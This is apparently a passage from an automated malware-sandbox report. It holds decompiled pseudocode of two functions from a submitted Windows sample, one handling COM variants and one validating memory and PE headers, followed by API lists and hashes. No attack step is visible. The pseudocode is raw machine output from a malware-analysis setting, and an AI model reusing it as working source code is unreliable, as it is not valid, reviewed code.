				signed short* _t114;
				signed short* _t116;
				signed short* _t117;
				signed short* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				signed short* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				CHAR* _t154;
				signed short* _t156;
				void* _t157;
				int _t160;
				char* _t165;
				void* _t166;
				void* _t168;
				CHAR* _t169;
				char* _t172;
				signed int _t177;
				CHAR* _t180;

				_t153 = __edx;
				_t148 = __ecx;
				E004128A0(E00431422, _t166);
				_t169 = _t168 - 0x2c;
				_t144 =  *(_t166 + 8);
				_t94 = _t144[8];
				_push(_t154);
				 *(_t166 - 0x10) = _t169;
				 *((intOrPtr*)(_t166 - 0x20)) = __ecx;
				 *(_t166 - 0x11) = 0;
				 *(_t166 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t166 + 8) = _t166 - 0x11;
				}
				_t95 = lstrlenA( *(_t166 + 8));
				_t174 =  *(_t166 + 0xc) & 0x0000000c;
				_t160 = _t95;
				 *(_t166 - 0x18) = _t144[0x10];
				 *(_t166 - 0x1c) = _t144[0xc];
				if(( *(_t166 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t166 + 0x14);
					_push(( *(_t166 + 0x14))[8] << 4);
					_t100 = E004080BD(_t145, _t148, _t154, _t160, _t177);
					_t178 = _t100;
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t166 - 0xc));
						return _t101;
					}
					E00412260((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t166 - 0x10) = _t169;
					 *(_t166 + 0xc) = _t169;
					E00412140( *(_t166 + 0xc), 0, _t145[8] << 4);
					_t172 =  &(_t169[0xc]);
					_t156 = E0042F3A5( *(_t166 + 8),  *(_t166 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t164 = _t38;
					_t108 = E004080BD(_t145, _t149, _t156, _t38, _t178);
					_t151 = _t38;
					if(_t108 != 0) {
						E00412260( &(_t164[1]) & 0xfffffffc, _t151);
						 *(_t166 - 0x10) = _t172;
						_t165 = _t172;
						_t114 = E0042F3E7( *((intOrPtr*)(_t166 - 0x20)), _t165,  *(_t166 + 8), _t166 - 0x34,  *(_t166 - 0x1c), _t145,  *(_t166 + 0x18),  *(_t166 + 0xc));
						_t147 = 0;
						__eflags = _t114;
						 *(_t166 + 0x18) = _t114;
						if(_t114 != 0) {
							L17:
							_t165 =  *(_t166 + 0x14);
							 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
							_t157 = 0;
							__eflags = _t165[8];
							if(_t165[8] <= 0) {
								L20:
								_t101 =  *(_t166 + 0x18);
								__eflags = _t101;
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t166 + 0x10);
								__eflags = _t156;
								if(_t156 == 0) {
									_t116 = ( *(_t166 - 0x1c) & 0x0000ffff) - 8;
									__eflags = _t116;
									if(_t116 == 0) {
										__eflags = _t147;
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										__eflags = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									__eflags = _t117;
									if(_t117 == 0) {
										L41:
										__eflags = _t147;
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									__eflags = _t120;
									if(_t120 == 0) {
										__imp__#9(_t166 - 0x34);
										goto L46;
									}
									__eflags = _t120 != 1;
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t166 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t125 - 0x13;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M0042F906))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										__esi = __ebp - 0x34;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t166 + 0xc));
								 *(_t166 + 0xc) =  &(( *(_t166 + 0xc))[0x10]);
								_t157 = _t157 + 1;
								__eflags = _t157 - _t165[8];
							} while (_t157 < _t165[8]);
							goto L20;
						}
						_t128 =  *(_t166 - 0x1c) & 0x0000ffff;
						__eflags = _t128 - 4;
						 *(_t166 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							E00430217();
							 *(_t166 + 8) = _t180;
							 *(_t166 - 0x34) =  *(_t166 + 8);
							goto L17;
						}
						__eflags = _t128 - 5;
						if(_t128 == 5) {
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							E00430217();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t166 - 0x34) = _t180;
							goto L17;
						}
						__eflags = _t128 - 7;
						if(_t128 == 7) {
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							E00430217();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						__eflags = _t128 - 0x13;
						if(_t128 <= 0x13) {
							L24:
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							_t147 = E00430217();
							goto L17;
						}
						__eflags = _t128 - 0x15;
						if(_t128 > 0x15) {
							goto L24;
						}
						_push(_t156);
						_push(_t165);
						_push( *(_t166 - 0x18));
						 *(_t166 - 0x34) = E00430217();
						 *((intOrPtr*)(_t166 - 0x30)) = _t153;
						goto L17;
					}
					goto L9;
				}
				_t17 = _t160 + 3; // 0x3
				_t158 = _t17;
				_t134 = E004080BD(_t144, _t148, _t17, _t160, _t174);
				_t148 = _t17;
				if(_t134 == 0) {
					goto L9;
				}
				E00412260(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t166 - 0x10) = _t169;
				_t154 = _t169;
				E00411AC0(_t154,  *(_t166 + 8), _t160);
				_t140 = _t144[0xc];
				_t169 =  &(_t169[0xc]);
				 *(_t166 + 8) = _t154;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t154[_t160] = 0xff;
				_t160 = _t160 + 1;
				_t23 = _t166 - 0x1c;
				 *_t23 =  *(_t166 - 0x1c) & 0x00000000;
				_t177 =  *_t23;
				_t154[_t160] = _t140;
				_t154[_t160 + 1] = 0;
				 *(_t166 - 0x18) = _t144[0x14];
				goto L7;
			}




































                                                                              0x0042f640
                                                                              0x0042f640
                                                                              0x0042f645
                                                                              0x0042f64a
                                                                              0x0042f64e
                                                                              0x0042f651
                                                                              0x0042f657
                                                                              0x0042f658
                                                                              0x0042f65b
                                                                              0x0042f65e
                                                                              0x0042f662
                                                                              0x0042f665
                                                                              0x0042f66a
                                                                              0x0042f66a
                                                                              0x0042f670
                                                                              0x0042f676
                                                                              0x0042f67a
                                                                              0x0042f67f
                                                                              0x0042f686
                                                                              0x0042f68a
                                                                              0x0042f6e4
                                                                              0x0042f6e4
                                                                              0x0042f6ed
                                                                              0x0042f6ee
                                                                              0x0042f6f3
                                                                              0x0042f6f5
                                                                              0x0042f6f6
                                                                              0x0042f73a
                                                                              0x0042f73a
                                                                              0x0042f8f2
                                                                              0x0042f8f8
                                                                              0x0042f903
                                                                              0x0042f903
                                                                              0x0042f706
                                                                              0x0042f70b
                                                                              0x0042f70e
                                                                              0x0042f717
                                                                              0x0042f71c
                                                                              0x0042f72a
                                                                              0x0042f72c
                                                                              0x0042f72c
                                                                              0x0042f730
                                                                              0x0042f737
                                                                              0x0042f738
                                                                              0x0042f74c
                                                                              0x0042f754
                                                                              0x0042f757
                                                                              0x0042f76b
                                                                              0x0042f770
                                                                              0x0042f772
                                                                              0x0042f774
                                                                              0x0042f777
                                                                              0x0042f7b5
                                                                              0x0042f7b5
                                                                              0x0042f7b8
                                                                              0x0042f7bc
                                                                              0x0042f7be
                                                                              0x0042f7c1
                                                                              0x0042f7dc
                                                                              0x0042f7dc
                                                                              0x0042f7df
                                                                              0x0042f7e1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f7e7
                                                                              0x0042f7ea
                                                                              0x0042f7ec
                                                                              0x0042f8bd
                                                                              0x0042f8bd
                                                                              0x0042f8c0
                                                                              0x0042f8e5
                                                                              0x0042f8e7
                                                                              0x0042f8ea
                                                                              0x0042f8ea
                                                                              0x0042f8f0
                                                                              0x0042f8f0
                                                                              0x0042f8f0
                                                                              0x00000000
                                                                              0x0042f8f0
                                                                              0x0042f8c2
                                                                              0x0042f8c2
                                                                              0x0042f8c3
                                                                              0x0042f8cd
                                                                              0x0042f8cd
                                                                              0x0042f8cf
                                                                              0x0042f8d4
                                                                              0x0042f8d4
                                                                              0x00000000
                                                                              0x0042f8cf
                                                                              0x0042f8c5
                                                                              0x0042f8c5
                                                                              0x0042f8c8
                                                                              0x0042f8dd
                                                                              0x00000000
                                                                              0x0042f8dd
                                                                              0x0042f8ca
                                                                              0x0042f8cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8cb
                                                                              0x0042f7f2
                                                                              0x0042f7f5
                                                                              0x0042f7fb
                                                                              0x0042f7fe
                                                                              0x0042f801
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f807
                                                                              0x00000000
                                                                              0x0042f8aa
                                                                              0x0042f8aa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f883
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f896
                                                                              0x0042f899
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f888
                                                                              0x0042f88b
                                                                              0x0042f88e
                                                                              0x0042f891
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8a6
                                                                              0x0042f8a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8b0
                                                                              0x0042f8b3
                                                                              0x0042f8b4
                                                                              0x0042f8b5
                                                                              0x0042f8b6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f87e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f807
                                                                              0x0042f7c9
                                                                              0x0042f7cc
                                                                              0x0042f7d2
                                                                              0x0042f7d6
                                                                              0x0042f7d7
                                                                              0x0042f7d7
                                                                              0x00000000
                                                                              0x0042f7c9
                                                                              0x0042f779
                                                                              0x0042f77d
                                                                              0x0042f780
                                                                              0x0042f783
                                                                              0x0042f840
                                                                              0x0042f841
                                                                              0x0042f842
                                                                              0x0042f845
                                                                              0x0042f84a
                                                                              0x0042f850
                                                                              0x00000000
                                                                              0x0042f850
                                                                              0x0042f789
                                                                              0x0042f78c
                                                                              0x0042f82b
                                                                              0x0042f82c
                                                                              0x0042f82d
                                                                              0x0042f830
                                                                              0x0042f835
                                                                              0x0042f838
                                                                              0x0042f838
                                                                              0x00000000
                                                                              0x0042f838
                                                                              0x0042f792
                                                                              0x0042f795
                                                                              0x0042f81c
                                                                              0x0042f81d
                                                                              0x0042f81e
                                                                              0x0042f821
                                                                              0x0042f826
                                                                              0x00000000
                                                                              0x0042f826
                                                                              0x0042f79b
                                                                              0x0042f79e
                                                                              0x0042f80e
                                                                              0x0042f80e
                                                                              0x0042f80f
                                                                              0x0042f810
                                                                              0x0042f818
                                                                              0x00000000
                                                                              0x0042f818
                                                                              0x0042f7a0
                                                                              0x0042f7a3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f7a5
                                                                              0x0042f7a6
                                                                              0x0042f7a7
                                                                              0x0042f7af
                                                                              0x0042f7b2
                                                                              0x00000000
                                                                              0x0042f7b2
                                                                              0x00000000
                                                                              0x0042f738
                                                                              0x0042f68c
                                                                              0x0042f68c
                                                                              0x0042f690
                                                                              0x0042f697
                                                                              0x0042f698
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f6a6
                                                                              0x0042f6ab
                                                                              0x0042f6ae
                                                                              0x0042f6b5
                                                                              0x0042f6ba
                                                                              0x0042f6be
                                                                              0x0042f6c5
                                                                              0x0042f6c8
                                                                              0x0042f6cc
                                                                              0x0042f6cc
                                                                              0x0042f6cd
                                                                              0x0042f6d1
                                                                              0x0042f6d2
                                                                              0x0042f6d2
                                                                              0x0042f6d2
                                                                              0x0042f6d6
                                                                              0x0042f6d9
                                                                              0x0042f6e1
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042F645
                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 0042F670
                                                                              • VariantClear.OLEAUT32(0000000C), ref: 0042F7CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearH_prologVariantlstrlen
                                                                              • String ID:
                                                                              • API String ID: 2416264355-0
                                                                              • Opcode ID: 59f262e93eb3d54c44b9b0ab4d4c3d0cb35394539a6f33b0ea7e153b6283f029
                                                                              • Instruction ID: 2f4d000993e90adcd9ce416889be71dcdf4490a590de9620ba8869da2dc1db70
                                                                              • Opcode Fuzzy Hash: 59f262e93eb3d54c44b9b0ab4d4c3d0cb35394539a6f33b0ea7e153b6283f029
                                                                              • Instruction Fuzzy Hash: DD81A431A00229EFCF10DFA9D8819AFBBB0FF45314FA0813AF81597251D7389955DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416F68, Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00416F68(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x45a5c8; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x45a610, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x45a5c8; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x45a610, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x45a5c8 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x45a5d0 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x45a5cc + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x45a5d0 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x45a5d0 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x45a610, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x45a5d0 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x45a5d0 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x45a610, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x45a5d0 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x45a5c8; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x45a5c8 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x45a5d0 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x45a5d0 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}



































                                                                              0x00416f70
                                                                              0x00416f73
                                                                              0x00416f79
                                                                              0x00416f96
                                                                              0x00000000
                                                                              0x00416f96
                                                                              0x00416f81
                                                                              0x00416f84
                                                                              0x00416f87
                                                                              0x00416f8c
                                                                              0x00416f8f
                                                                              0x00416f9e
                                                                              0x00416fa1
                                                                              0x00416fa4
                                                                              0x00416fae
                                                                              0x00416fae
                                                                              0x00416fb0
                                                                              0x00416fb3
                                                                              0x00416fb5
                                                                              0x00416fb5
                                                                              0x00416fb7
                                                                              0x00416fba
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416fbc
                                                                              0x00416fbe
                                                                              0x00417109
                                                                              0x00417109
                                                                              0x0041718c
                                                                              0x00000000
                                                                              0x0041718c
                                                                              0x00416fc4
                                                                              0x00416fc4
                                                                              0x00416fc8
                                                                              0x00416fca
                                                                              0x00416fca
                                                                              0x00416fca
                                                                              0x00416fca
                                                                              0x00416fcd
                                                                              0x00416fce
                                                                              0x00416fd1
                                                                              0x00416fd1
                                                                              0x00416fd5
                                                                              0x00416fd9
                                                                              0x00416fef
                                                                              0x00416fef
                                                                              0x00416ff6
                                                                              0x00416ffc
                                                                              0x00416ffe
                                                                              0x00417000
                                                                              0x00417014
                                                                              0x0041701b
                                                                              0x00417021
                                                                              0x00417023
                                                                              0x00417189
                                                                              0x00417189
                                                                              0x00417189
                                                                              0x00000000
                                                                              0x00417189
                                                                              0x00417029
                                                                              0x00417030
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417036
                                                                              0x0041703a
                                                                              0x00417092
                                                                              0x00417099
                                                                              0x0041709f
                                                                              0x004170a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004170a7
                                                                              0x004170ad
                                                                              0x004170af
                                                                              0x004170b1
                                                                              0x004170c6
                                                                              0x004170c6
                                                                              0x004170c8
                                                                              0x004170f7
                                                                              0x004170fe
                                                                              0x00000000
                                                                              0x004170fe
                                                                              0x004170cc
                                                                              0x004170cd
                                                                              0x004170cf
                                                                              0x004170d1
                                                                              0x004170d1
                                                                              0x004170d3
                                                                              0x004170d5
                                                                              0x004170d7
                                                                              0x004170eb
                                                                              0x004170eb
                                                                              0x004170ee
                                                                              0x004170f0
                                                                              0x004170f0
                                                                              0x004170f1
                                                                              0x004170f1
                                                                              0x00000000
                                                                              0x004170d9
                                                                              0x004170d9
                                                                              0x004170d9
                                                                              0x004170e2
                                                                              0x004170e3
                                                                              0x004170e5
                                                                              0x004170e7
                                                                              0x004170e7
                                                                              0x00000000
                                                                              0x004170d9
                                                                              0x004170d7
                                                                              0x004170b3
                                                                              0x004170ba
                                                                              0x004170ba
                                                                              0x004170bc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004170be
                                                                              0x004170bf
                                                                              0x004170c2
                                                                              0x004170c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004170c4
                                                                              0x00000000
                                                                              0x004170ba
                                                                              0x0041703c
                                                                              0x0041703f
                                                                              0x00417044
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041704d
                                                                              0x0041704f
                                                                              0x00417055
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041705b
                                                                              0x00417061
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417067
                                                                              0x00417069
                                                                              0x00417072
                                                                              0x00417076
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041707c
                                                                              0x0041707f
                                                                              0x00417081
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417088
                                                                              0x0041708a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041708c
                                                                              0x00417090
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417002
                                                                              0x00417002
                                                                              0x00417002
                                                                              0x00417009
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041700f
                                                                              0x00417010
                                                                              0x00417012
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417012
                                                                              0x0041710d
                                                                              0x0041710f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417122
                                                                              0x00417124
                                                                              0x00417126
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041712c
                                                                              0x00417133
                                                                              0x00417163
                                                                              0x00417163
                                                                              0x00417165
                                                                              0x00417167
                                                                              0x0041717b
                                                                              0x00417182
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417169
                                                                              0x00417169
                                                                              0x00417169
                                                                              0x00417172
                                                                              0x00417173
                                                                              0x00417175
                                                                              0x00417177
                                                                              0x00417177
                                                                              0x00000000
                                                                              0x00417169
                                                                              0x00417135
                                                                              0x0041713a
                                                                              0x0041713a
                                                                              0x0041713d
                                                                              0x0041713f
                                                                              0x00417151
                                                                              0x00417151
                                                                              0x00417154
                                                                              0x00417156
                                                                              0x00417156
                                                                              0x00417157
                                                                              0x00417157
                                                                              0x0041715c
                                                                              0x0041715c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417141
                                                                              0x00417141
                                                                              0x00417141
                                                                              0x00417148
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041714a
                                                                              0x0041714a
                                                                              0x0041714b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041714b
                                                                              0x0041714d
                                                                              0x0041714f
                                                                              0x00417161
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417161
                                                                              0x00000000
                                                                              0x0041714f
                                                                              0x00416fdb
                                                                              0x00416fde
                                                                              0x00416fe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416fe7
                                                                              0x00416fe9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416fe9
                                                                              0x00416fa6
                                                                              0x00416fa8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00412C31,?), ref: 0041701B
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000001), ref: 00417099
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000000), ref: 004170FE
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000001), ref: 00417122
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000000), ref: 00417182
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$QueryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2947987494-0
                                                                              • Opcode ID: 0aa183bda9df58c028869d4e75be92f0ccf6beec2a2a0e118c9584023782ac0b
                                                                              • Instruction ID: c95ea2de7b60af55566014a0c679c7fd9ca5feca68085abe148ecfceabce0a8c
                                                                              • Opcode Fuzzy Hash: 0aa183bda9df58c028869d4e75be92f0ccf6beec2a2a0e118c9584023782ac0b
